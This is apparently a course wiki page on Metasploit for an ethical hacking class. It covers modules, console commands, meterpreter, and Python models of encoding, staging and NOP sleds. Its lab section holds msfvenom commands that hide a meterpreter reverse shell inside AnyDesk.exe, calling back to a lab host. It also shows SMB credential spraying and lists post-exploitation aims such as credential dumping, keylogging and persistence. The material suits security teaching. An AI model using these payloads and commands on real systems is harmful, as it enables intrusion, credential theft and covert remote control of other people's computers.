Metaspoit - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

Metasploit

  • Vulnerability vs Pen-Testing
  • Nessus - https://www.tenable.com/
  • NMAP
  • w3af - https://w3af.org/ w3af is an open-source web application security scanning tool.
  • Armitage - Java GUI front end for Metasploit (it drives the framework over its RPC service) that automates the common scan/exploit/session steps. apt-get install armitage

Browse the directories

ls -al /usr/share/metasploit-framework
ls /usr/share/metasploit-framework/modules   # module tree: exploits, auxiliary, post, payloads, encoders, nops, evasion
hosts -u                                     # inside msfconsole: list database hosts that are up
shell                                        # inside a meterpreter session: drop to an OS shell on the target

Brief History

  • https://pentest.tonyng.net/list-of-metasploit-commands-cheatsheet/
  • HD Moore - released first version in 2003 with 11 exploits written in Perl
  • Open Source Project
  • re-written in 2007 in Ruby (Version 3)
  • acquired by Rapid7 in 2009
  • supports 2000+ exploits and 3000+ modules
  • has exploits for all major OS, products and services
  • 2020 -> supported social engineering test
  • Supports automation and integrations even with FREE version
  • Clean exploits (no backdoors!!)

Install in Windows

Metasploit is a FRAMEWORK

  • Not the only player in the market - Cobalt Strike (commercial) is the main alternative
  • allows creation of workspace to keep projects separate

Metasploit Modules

auxiliary modules (pre-exploitation)

  • recon stage
  • scanning stage
  • 1000+ auxiliary modules spread across 18 categories in the Metasploit Framework.
  • Example categories (subdirectories of modules/auxiliary): gather, pdf, vsploit, bnat, sqli, client, crawler, fuzzers
  • show auxiliary
  • search tcp type:auxiliary
  • use auxiliary/scanner/portscan/tcp
  • show options

Exploits

  • Gaining access

Encoders

Encoders rewrite the payload (not the exploit) so that its bytes avoid characters the vulnerable input cannot carry (bad characters such as \x00 or \x0a) and look different on every run; a small decoder stub prepended to the payload restores it in memory. Because that stub is a fixed code pattern, encoding is not a reliable way to get past antivirus.
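What an encoder actually does is easiest to see in code. The block below is an added example written for this page, not Metasploit's x86/shikata_ga_nai implementation: it models the same XOR additive-feedback scheme (each dword is XORed with a running key, and the key is then updated with the dword just processed) and the retry loop that msfvenom -b performs to find a key whose output contains no bad character. The names, SAMPLE_SHELLCODE and BADCHARS are constructed for the example. What it leaves out is the part that matters for detection: the real encoder also prepends an x86 decoder stub that performs decode_xor_feedback at run time, and that stub is itself a static code pattern.

```python
import os
import struct

# Constructed input: deliberately contains 0x00, 0x0a and 0x0d, the classic
# bad characters for a string-copy or text-protocol overflow.
SAMPLE_SHELLCODE = bytes(range(64))
BADCHARS = b"\x00\x0a\x0d"


def _to_dwords(data: bytes) -> list:
    """Pad to a 4-byte boundary (with 0x90 NOPs, a constructed choice) and
    split into little-endian dwords, the unit the feedback loop works on."""
    data = data + b"\x90" * ((-len(data)) % 4)
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def encode_xor_feedback(shellcode: bytes, key: int) -> bytes:
    """XOR each dword with the running key, then add the plaintext dword into
    the key (additive feedback): a different key changes every output byte."""
    out = bytearray()
    for w in _to_dwords(shellcode):
        out += struct.pack("<I", w ^ key)
        key = (key + w) & 0xFFFFFFFF
    return bytes(out)


def decode_xor_feedback(encoded: bytes, key: int) -> bytes:
    """Mirror of the decoder stub an encoder prepends to the payload."""
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", encoded):
        w = enc ^ key
        out += struct.pack("<I", w)
        key = (key + w) & 0xFFFFFFFF
    return bytes(out)


def encode_avoiding(shellcode: bytes, badchars: bytes, max_tries: int = 10000):
    """What msfvenom -b does: try random keys until neither the encoded bytes
    nor the key (which ends up inside the decoder stub) contain a bad char."""
    for _ in range(max_tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        if any(b in badchars for b in struct.pack("<I", key)):
            continue
        encoded = encode_xor_feedback(shellcode, key)
        if not any(b in badchars for b in encoded):
            return key, encoded
    raise RuntimeError("no key satisfies the bad-character constraint")


if __name__ == "__main__":
    key, enc = encode_avoiding(SAMPLE_SHELLCODE, BADCHARS)
    print(f"key 0x{key:08x}, encoded {len(enc)} bytes, "
          f"bad chars left: {any(b in BADCHARS for b in enc)}")
    restored = decode_xor_feedback(enc, key)[:len(SAMPLE_SHELLCODE)]
    print("round trip ok:", restored == SAMPLE_SHELLCODE)
```

Running it twice gives two different encoded blobs for the same input, which is the "polymorphic" property; running -i 15 in the lab below just repeats the process fifteen times, adding a stub each time.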

Payloads

  • Singles - self-contained: the payload carries everything it needs (for example windows/shell_reverse_tcp) and runs in one step, with no second download. Note the naming: an underscore between shell and reverse_tcp means a single.
  • Stagers - a small first-stage payload (reverse_tcp, bind_tcp, reverse_https) whose only job is to set up the connection between the target and the attacker's handler and then fetch the stage. It contains no functionality of its own.
  • Stages - the larger payload (meterpreter, a plain shell, VNC) that the handler sends over the stager's connection and that runs in memory. windows/shell/reverse_tcp (slash) is a stager plus stage. None of these contain the exploit: the exploit triggers the vulnerability, the payload is what runs afterwards.
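To make the single/stager/stage distinction concrete, here is a loopback model of what a staged reverse_tcp payload and its handler do on the wire. It is an added example written for this page, not Metasploit code: the handler function plays exploit/multi/handler, the stager function plays the tiny first stage, and FAKE_STAGE is a constructed byte string rather than real machine code (a real stager would copy the received bytes into executable memory and jump to them). The 4-byte little-endian length prefix is the real reverse_tcp staging convention; the function names, the port choice and the stage bytes are this example's assumptions. A single payload has no second step at all, which is exactly why it is larger.

```python
import socket
import struct
import threading

# Constructed placeholder standing in for a stage (real stages are machine
# code, e.g. meterpreter's metsrv DLL); any bytes will do for the exchange.
FAKE_STAGE = b"\x90" * 16 + b"STAGE:meterpreter-placeholder"


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; a stage is far larger than one recv() delivers."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the full stage arrived")
        buf += chunk
    return bytes(buf)


def handler(listener: socket.socket, stage: bytes) -> None:
    """Handler side (what exploit/multi/handler does for a staged payload):
    accept the stager's connection and push the stage, prefixed with its
    4-byte little-endian length."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def stager(lhost: str, lport: int) -> bytes:
    """Stager side (what the first stage of windows/meterpreter/reverse_tcp
    does): connect back to LHOST:LPORT, read the length, read that many
    bytes. A real stager would then execute them from memory."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        return recv_exact(s, length)


def staged_exchange(stage: bytes = FAKE_STAGE) -> bytes:
    """Run both sides over loopback and return what the stager received."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free LPORT
    listener.listen(1)
    lport = listener.getsockname()[1]
    t = threading.Thread(target=handler, args=(listener, stage))
    t.start()
    try:
        return stager("127.0.0.1", lport)
    finally:
        t.join()
        listener.close()


if __name__ == "__main__":
    got = staged_exchange()
    print(f"stager pulled a {len(got)}-byte stage; intact: {got == FAKE_STAGE}")
```

Two practical consequences fall out of the model: the handler must be listening before the stager runs (otherwise the connect fails and the session never appears), and a staged payload is easy to spot on the network as a short connection immediately followed by a length-prefixed blob of tens or hundreds of kilobytes.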

NOPS (No operation)

  • NOPs are used when the exact address the exploit will jump to is not known precisely: a run of NOPs (a NOP sled) makes any landing address inside the run acceptable
  • NOPs are placed before the shellcode; the CPU executes them one after another, doing nothing, and slides into the shellcode at its real start
  • \x90 is the single-byte x86 NOP (xchg eax,eax). msfvenom -n prepends a sled of a given length, and the nops modules (for example x86/opty2) build sleds out of varied NOP-equivalent instructions so the sled is not the long 0x90 run that IDS signatures match
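A small model of why a sled makes the landing address tolerant, added here as an example; it is not taken from the page or from Metasploit's nop modules. It builds either a plain 0x90 sled (what msfvenom -n gives you) or a sled of mixed single-byte NOP-equivalents in the spirit of x86/opty2, then checks from which entry offsets execution reaches the shellcode. SAMPLE_SHELLCODE is a few constructed marker bytes, and the execution model understands only the single-byte instructions listed in NOP_EQUIVALENTS.

```python
import random

# Single-byte x86 opcodes that can stand in for nop (0x90) in a sled:
# 0x40-0x47 inc reg, 0x48-0x4f dec reg, 0xf5 cmc, 0xf8 clc, 0xf9 stc,
# 0xfc cld, 0xfd std. inc/dec clobber a register and the others clobber
# flags, so a real generator like x86/opty2 must skip any the shellcode
# depends on; this model ignores that and only tracks the instruction pointer.
NOP_EQUIVALENTS = (bytes([0x90]) + bytes(range(0x40, 0x50))
                   + bytes([0xF5, 0xF8, 0xF9, 0xFC, 0xFD]))

# Constructed marker bytes standing in for shellcode (xor eax,eax; push eax; ...).
# Its first byte must not be a NOP-equivalent or the model can't see where it starts.
SAMPLE_SHELLCODE = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"


def build_sled(length: int, plain: bool = True, seed: int = 0) -> bytes:
    """plain=True: a run of 0x90, what msfvenom -n <length> prepends.
    plain=False: random NOP-equivalents, so there is no long 0x90 run to match."""
    if plain:
        return b"\x90" * length
    rng = random.Random(seed)          # seeded only to keep the example reproducible
    return bytes(rng.choice(NOP_EQUIVALENTS) for _ in range(length))


def build_buffer(sled_len: int, shellcode: bytes, plain: bool = True) -> bytes:
    """[sled][shellcode]: the overwritten return address only has to point
    somewhere inside the sled, not exactly at the shellcode."""
    if shellcode[0] in NOP_EQUIVALENTS:
        raise ValueError("shellcode must not start with a sled byte in this model")
    return build_sled(sled_len, plain) + shellcode


def execute_from(buf: bytes, ip: int) -> int:
    """Model execution landing at offset ip: NOP-equivalents fall through and
    the index of the first other byte is where real code starts running."""
    while ip < len(buf) and buf[ip] in NOP_EQUIVALENTS:
        ip += 1
    return ip


def landing_window(buf: bytes, shellcode_start: int) -> list:
    """Every entry offset from which execution reaches the start of the shellcode."""
    return [ip for ip in range(len(buf)) if execute_from(buf, ip) == shellcode_start]


if __name__ == "__main__":
    run_of_nops = b"\x90" * 8
    for plain in (True, False):
        buf = build_buffer(64, SAMPLE_SHELLCODE, plain=plain)
        win = landing_window(buf, 64)
        print(f"{'plain' if plain else 'varied'} sled: {len(win)} usable entry "
              f"offsets ({win[0]}..{win[-1]}), 0x90 run present: {run_of_nops in buf}")
```

With a 64-byte sled the guessed address may be off by up to 64 bytes and still work; land one byte past the sled start of the shellcode and the CPU decodes garbage, which is the failure mode the sled exists to absorb.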

POST module (post exploitation)

  • privilege escalation
  • Dump OS credentials
  • Steal cookies and saved passwords
  • Get key logs from the target system
  • Execute PowerShell scripts
  • persistent access

Libraries

Rex - the base library: sockets, TCP/IP, SSL, protocol clients (SMB, HTTP and others), encoding and text handling

Msf::Core - the framework API: module types, exploit mixins, sessions, the datastore

Msf::Base - conveniences built on Core: configuration, session management, logging, the simplified API the interfaces use

MSF UI - the interfaces and drivers: msfconsole (CLI), msfrpcd, and GUIs such as Armitage

USE CASES

  • Information gathering - auxiliary modules: scanner/portscan/syn, scanner/portscan/tcp, db_nmap, scanner/ftp/ftp_version, gather/shodan_search
  • Enumeration - scanner/smb/smb_enumshares, scanner/smb/smb_enumusers, scanner/smb/smb_login
  • Gaining access - any Metasploit exploit combined with a compatible payload
  • Privilege escalation - in meterpreter: getsystem (the priv extension it needs is loaded by default on Windows meterpreter; older versions required use priv first)
  • Maintaining access - meterpreter run persistence (a deprecated script; post/windows/manage/persistence_exe is the current module)
  • Covering tracks - Metasploit Anti-Forensics Project (timestomp and related tools)

Reporting is a PRO version feature

System requirement

  • Kali Linux
  • Parrot

Set up metasploit for testing

  • Supported in all major OS
  • for Windows the installer bundles PostgreSQL; after installing, confirm with db_status inside msfconsole that the console is connected to the database

Workspace

workspace -a new_workspace     # create and switch to a workspace; scan results, hosts and creds are kept per workspace
workspace -d old_workspace     # delete a workspace
db_status                      # shows whether the console is connected to PostgreSQL
# the database settings live in ~/.msf4/database.yml (or config/database.yml inside the install)
# a sample to copy and rename is at metasploit-framework/embedded/framework/config/database.yml.example

Metasploit Interfaces

MSFconsole

  • interactive shell, the main interface
  • for scripting use msfconsole -x "command1; command2" or msfconsole -r file.rc with a resource script (one console command per line)

MSFcli

  • no longer in development since 2015
  • can convert steps into scripts

Armitage (GUI wrapper)

  • no longer pre-installed on Kali; install it separately (apt-get install armitage)

MSFCONSOLE

some quick commands

  • connect cnn.com 80 -> netcat-style raw connection to a host and port
  • route -> add / delete routes so modules can reach networks through an existing session (pivoting)
  • save -> save the current datastore (global and module options) to disk
  • sessions -> list active sessions; sessions -i N interacts with one
  • spool -> send console output to a log file
  • show -h -> list what can be shown (modules, options, payloads, targets, ...)
  • irb -> interactive Ruby shell inside the framework
  • makerc -> write the commands entered in this session to a resource file, replayable with msfconsole -r

Update MSF

  • msfupdate (on Kali the framework is a distro package, so update it through apt's metasploit-framework package instead)
banner                           # banner plus module counts
help
search                           # search -h lists the keywords: type:, platform:, port:, cve:, name:, path: ...
search auxiliary
search exploits
search portscan
search windows
search mac
search platform:windows
search port:21
search port:22
search port:22 type:exploit      # type: takes the singular module type: exploit, auxiliary, post, payload, encoder, nop
search -h

use <module path or search result number>
set RHOSTS <target, range, CIDR or file:hosts.txt>
set PORTS <port range>           # option name of scanner/portscan/tcp; most other modules use RPORT
run


search cve:2017 type:exploit

search port:22 type:exploit
info 10                          # details on result number 10 of the last search

nmap

nmap 192.168.1.1/24 -v               # plain nmap: results go to the screen only

**db_nmap 192.168.1.1/24 -v**        # same scan run through msfconsole; hosts and services are saved in the current workspace

Selecting an exploit with use attaches a default payload automatically; show payloads lists the compatible ones and set payload overrides the default

search smb
search doublepulsar
use 1                                # result number from the search above
set payload windows/x64/shell_reverse_tcp
info
show options

RHOST / RHOSTS

  • IP of the remote target; RHOSTS also accepts ranges, CIDR notation and file:hosts.txt

LHOST

  • IP of the attacking machine that a reverse payload connects back to; it must be reachable from the target (NAT or VPN addresses are the usual reason a session never arrives), and LPORT is the matching port

Check status of database

should be running

  • systemctl start postgresql   # start the PostgreSQL service the framework uses
  • msfdb status                 # or db_status from inside msfconsole

for reinitialization (drops and recreates the msf database and its users)

msfdb reinit
msfdb status

Meterpreter

Information gathering

Passive information gathering

  • msf > ping google.com              # msfconsole passes commands it does not know to the OS shell
  • msf > traceroute google.com
  • msf > dig google.com
  • note: ping, traceroute and dig all send packets towards the target or its DNS, so they are only "passive" in the sense of not probing services; strictly passive sources are public records (WHOIS, Shodan via gather/shodan_search)

Active information gathering

msf> nmap 192.168.1.100 -oA saved        # -oA takes a base name and writes saved.nmap, saved.gnmap and saved.xml
msf> db_import saved.xml                 # import the XML into the current workspace
# db_nmap runs nmap and imports the results directly, no db_import needed
msf> db_nmap 192.168.1.100
msf> hosts
search type:auxiliary path:auxiliary/scanner port:22
use 0                                    # result number from the search above
show options
set RHOSTS 10.0.0.1                      # RHOST is accepted as an alias on most modules
show options
run
back

Setting RHOSTS globally

setg RHOSTS 10.0.0.1       # global value picked up by every module that has an RHOSTS option
unset RHOSTS               # clears the module-level value (unsetg clears the global one)
hosts -R                   # fill RHOSTS from the hosts table of the current workspace

finding an auxiliary scanner

search type:auxiliary path:auxiliary/scanner tcp
use 23
show options
run

Vulnerability Assessment with Metasploit

WMAP

  • web application scanner plugin, originally derived from sqlmap
load wmap
>wmap_sites -a http://10.0.0.100      # register the site as a URL
>wmap_sites -l                        # list registered sites
>wmap_targets -t http://10.0.0.100/   # pick the target from the registered sites
>wmap_run -t                          # list the modules that will be run
>wmap_run -e                          # execute them
>wmap_vulns -l                        # list findings (also stored in the workspace)

Importing Nessus Scan

  • export as .nessus file type
  • db_import scan.nessus
  • hosts
  • vulns

Exploiting target hosts

search            # find a module
use               # select it
run               # execute it (exploit is a synonym for exploit modules)
nmap host
search port:21
use 18
info
show options

MSFVENOM

MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.

The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Meterpreter

  • https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/
  • It is a Metasploit attack payload that provides an interactive command shell, extended with file system, process, networking, pivoting and privilege escalation commands, from which the attacker explores the target and executes code.
  • Meterpreter is deployed by reflective DLL injection: the stage is mapped into the exploited process's memory without going through the normal loader.
  • The payload itself resides in memory and writes nothing to disk; the delivery vehicle may (the executable built in Lab 3 below is a file on the target), and the reverse connection is visible on the network.
  • So the forensic footprint is small, not zero: memory capture, network logs and EDR telemetry still catch it.

Lab - SMB_LOGIN

search smb_login
use 0                          # auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.0.32
set SMBUser student            # option names are case-insensitive in msfconsole
set SMBPass student
show options
exploit                        # run and exploit are interchangeable on an auxiliary module
ping 192.168.0.31
connect 192.168.0.32 445       # connect needs both host and port
show options
run
history
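Putting the scan/import/scan workflow above together with this lab: the added example below (written for this page, not part of the course material or of the framework) parses nmap -oX output for hosts that have 445/tcp open and writes a resource script that runs smb_login against exactly those hosts, to be replayed with msfconsole -q -r smb_login.rc. SAMPLE_NMAP_XML is constructed lab data; the module and option names (auxiliary/scanner/smb/smb_login, RHOSTS, SMBUser, SMBPass, STOP_ON_SUCCESS) are Metasploit's own.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for a lab subnet; not a real scan.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sS -p 22,445 -oX lab.xml 192.168.0.0/24">
  <host><status state="up"/><address addr="192.168.0.31" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/></port>
           <port protocol="tcp" portid="445"><state state="closed"/></port></ports></host>
  <host><status state="up"/><address addr="192.168.0.32" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports></host>
  <host><status state="down"/><address addr="192.168.0.33" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="192.168.0.40" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports></host>
</nmaprun>
"""


def hosts_with_open_port(nmap_xml: str, port: int, proto: str = "tcp") -> list:
    """IPv4 addresses of hosts that are up and have port/proto reported open."""
    hits = []
    for host in ET.fromstring(nmap_xml).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        for p in host.iter("port"):
            state = p.find("state")
            if (p.get("protocol") == proto and int(p.get("portid")) == port
                    and state is not None and state.get("state") == "open"):
                hits.append(addr.get("addr"))
                break
    return hits


def build_smb_login_rc(hosts, user, password, workspace="lab", xml_path=None):
    """Resource script for smb_login against the given hosts, one console
    command per line, exactly as they would be typed in msfconsole."""
    if not hosts:
        raise ValueError("no hosts with SMB open; refusing to write an empty scan")
    lines = [f"workspace -a {workspace}"]          # creates or switches to the workspace
    if xml_path:
        lines.append(f"db_import {xml_path}")        # keep the nmap results in the database too
    lines += [
        "use auxiliary/scanner/smb/smb_login",
        "set RHOSTS " + " ".join(hosts),
        f"set SMBUser {user}",
        f"set SMBPass {password}",
        "set STOP_ON_SUCCESS true",                  # stop per host after the first valid login
        "run",
        "creds",                                     # successful logins are stored as credentials
        "exit",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    targets = hosts_with_open_port(SAMPLE_NMAP_XML, 445)
    rc = build_smb_login_rc(targets, "student", "student", xml_path="lab.xml")
    with open("smb_login.rc", "w") as fh:
        fh.write(rc)
    print(rc)
    print("replay with: msfconsole -q -r smb_login.rc")
```

Filtering on the scan result is the point: spraying a credential at hosts that do not even expose SMB produces noise in the target's logs and nothing in yours. The same generator pattern works for any scanner module; only the module path and option names change.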

LAB 3

  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x /home/student/Desktop/AnyDesk.exe

  • sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodWinMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=192.168.0.31 lport=4949 -x /home/student/Desktop/AnyDesk.exe

  • -x uses AnyDesk.exe as the template (icon and metadata); add -k if the template should keep running normally after the payload starts. lhost accepts an interface name (eth0) or an IP, and it must be reachable from the target.
  • 15 iterations of shikata_ga_nai avoid bad characters and change the bytes on every build; they do not reliably defeat current antivirus, which flags the decoder stub and the behaviour of the process.
  • a listener must already be running before the file is executed on the target: exploit/multi/handler with the same payload, LHOST and LPORT (4949).